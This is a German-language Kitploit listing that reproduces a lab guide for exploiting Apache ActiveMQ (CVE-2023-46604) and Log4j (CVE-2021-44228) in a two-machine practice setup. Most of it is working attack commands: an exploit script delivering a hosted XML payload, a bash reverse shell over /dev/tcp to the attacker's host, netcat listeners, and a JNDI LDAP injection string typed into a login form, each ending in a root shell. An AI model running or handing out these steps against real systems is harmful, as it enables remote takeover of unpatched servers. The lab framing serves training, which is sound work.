Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-Lab — Anleitungen zur Ausnutzung der Schwachstellen CVE-2021-44228 und CVE-2023-46604 | Kitploit
Tools/GitHubGitHub/dcm2406/cve-lab
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubdcm2406/cve-lab

CVE-Lab

Anleitungen zur Ausnutzung der Schwachstellen CVE-2021-44228 und CVE-2023-46604

Repository anzeigen
24vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-46604 Labor

Dieses Labor führt Sie durch die Ausnutzung der Schwachstellen von CVE-2023-46604

Danksagungen

  • Apache ActiveMQ
  • CVE-2023-46604

Umgebung

Dieses Labor erfordert die Installation von 2 virtuellen Maschinen. Eine Kali-Linux-Maschine, Version 2023.4, und eine Ubuntu-Maschine, Version 22.04.3 LTS. Sie können diese hier herunterladen:

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 for windows
  • VMware-workstation-17.5.0 for linux

Modell- und Systemanforderungen

Auf der Kali-Linux-Maschine:

Git installieren

root@kitploit:~
$sudo apt install git

gedit installieren

Tool herunterladen
root@kitploit:~
$sudo apt install gedit

Auf der Ubuntu-Maschine:

Git installieren

root@kitploit:~
$sudo apt install git

OpenJDK 18 installieren

root@kitploit:~
$sudo apt install openjdk-18-jdk

ActiveMQ-Paket 5.18.2 installieren

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz

Server einrichten (ActiveMQ-Dienst starten)

Auf der Ubuntu-Maschine Öffnen Sie ein Terminalfenster und führen Sie den folgenden Befehl aus:

root@kitploit:~
$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start

Status des Dienstes überprüfen:

root@kitploit:~
$./activemq status

Wenn der Dienst erfolgreich startet, wird auf dem Terminalbildschirm "ActiveMQ Brocker is running" angezeigt.

Sie können auch http://127.0.0.1:8161 besuchen, um den ActiveMQ-Broker-Manager zu öffnen. Er enthält den Hostnamen, die Version, die ID, die Betriebszeit und einige andere Informationen.

Ausnutzen der Schwachstelle

Auf der Kali-Linux-Maschine

Ressourcen für den Exploit-Prozess herunterladen:

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls

Wie Sie sehen können, haben wir 2 Dateien: exploit.py und poc.xml:

  • Die Datei poc.xml enthält einen Teil bösartigen Codes, der eine Schwachstelle im OpenWire-Protokoll ausnutzt.
  • Die Datei exploit.py ist für die HTTP-Verschlüsselung und das Senden der Datei poc.xml an den Broker auf der Zielmaschine verantwortlich. Starten Sie einen Webserver im Ressourcenpfad:
root@kitploit:~
$cd CVE-2023-46604
$python3 -m http.server

Öffnen Sie ein neues Terminalfenster, um die Datei poc.xml über die Datei exploit.py an den Server des Ziels zu senden:

root@kitploit:~
$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

Nachdem der Befehl ausgeführt wurde, wird die Anwendung Taschenrechner auf der Zielmaschine gestartet. Dies beweist, dass die Schwachstelle erfolgreich ausgenutzt wurde. Anschließend erstellen wir eine Reverse Shell, um die Zielmaschine zu kontrollieren.

Öffnen Sie ein neues Terminalfenster, um auf Reverse-Shell-Verbindungen zu lauschen:

root@kitploit:~
$sudo su
$nc -nlvp 4444

Kehren Sie zum vorherigen Terminal zurück und bearbeiten Sie die Datei poc.xml:

root@kitploit:~
$gedit poc.xml

Ersetzen Sie den Wert gnome-calculator durch bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 und speichern Sie die Datei.

Bösartigen Code erneut senden:

root@kitploit:~
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

Das Ergebnis dieses Befehls ist, dass wir die Root-Shell auf der Zielmaschine erhalten haben. ROOTED!!!

CVE-2021-44228 Labor

Danksagungen

  • Apache log4j
  • CVE-2023-44228 - log4shell

Umgebung

Dieses Labor erfordert die Installation von 2 virtuellen Maschinen. Eine Kali-Linux-Maschine, Version 2023.4, und eine Ubuntu-Maschine, Version 22.04.3 LTS. Sie können diese hier herunterladen:

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 for windows
  • VMware-workstation-17.5.0 for linux

Modell- und Systemanforderungen

Auf der Kali-Linux-Maschine:

Git installieren

root@kitploit:~
$sudo apt install git

gedit installieren

root@kitploit:~
$sudo apt install gedit

Auf der Ubuntu-Maschine:

Git installieren

root@kitploit:~
$sudo apt install git

Docker installieren

root@kitploit:~
$sudo apt install docker.io 

Webserver einrichten

Auf der Ubuntu-Maschine

Schritt 1: OpenJDK herunterladen

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
$tar -xf jdk-8u20-linux-x64.tar.gz

Schritt 2: Docker-Datei herunterladen und erstellen

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/web-server-cve44228
root@kitploit:~
$docker build -t cve44228
$docker run --network host cve44228

Nach Abschluss der obigen Befehle haben wir eine Website. Zum Surfen können Sie die URL: http://<ubuntu_ip>:8080 verwenden. In diesem Tutorial sieht die Adresse wie folgt aus: http://192.168.132.135:8080

Ausnutzen der Schwachstelle

Laden Sie auf der Kali-Linux-Maschine die notwendigen Ressourcen herunter, um die Schwachstelle auszunutzen.

PoC herunterladen

root@kitploit:~
$sudo su
$git clone https://github.com/kozmer/log4j-shell-poc
$pip install -r requirement.txt

OpenJDK herunterladen

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz

//move the openjdk file to the directory containing the poc file
$mv jdk-8u20-linux-x64.tar.gz <path to the directory containing the poc file>

$tar -xf jdk-8u20-linux-x64.tar.gz   //unzip the file

Öffnen Sie ein neues Terminal, um auf Reverse-Shell-Verbindungen zu lauschen:

root@kitploit:~
$sudo su
$nc -nlvp 9001

LDAP- und HTTP-Dienste mit der PoC-Datei starten

root@kitploit:~
$sudo su
$cd log4j-shell-poc
$python3 poc.py --userip 192.168.132.130 --lport 9001 --webport 8080

Der Befehl gibt Ergebnisse ähnlich den folgenden zurück:

root@kitploit:~
[!] CVE: CVE-2021-44228
Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://192.168.132.130:1389/a}

[+] Starting Webserver on port 8080 http://0.0.0.0:8080
Listening on 0.0.0.0:1389

Hier interessiert uns nur der generierte JNDI-Wert. Öffnen Sie einen Webbrowser und geben Sie die Adresse der zuvor erstellten Website ein. Melden Sie sich mit dem JNDI-Wert an. Zu diesem Zeitpunkt empfängt das Netcat-Terminal eine Verbindung. ROOTED!!!

Dokumentation

CVE-Forschungsbericht

Support

Für Support senden Sie eine E-Mail an [email protected]

Autoren

  • @dcm2406
  • @tCu0n9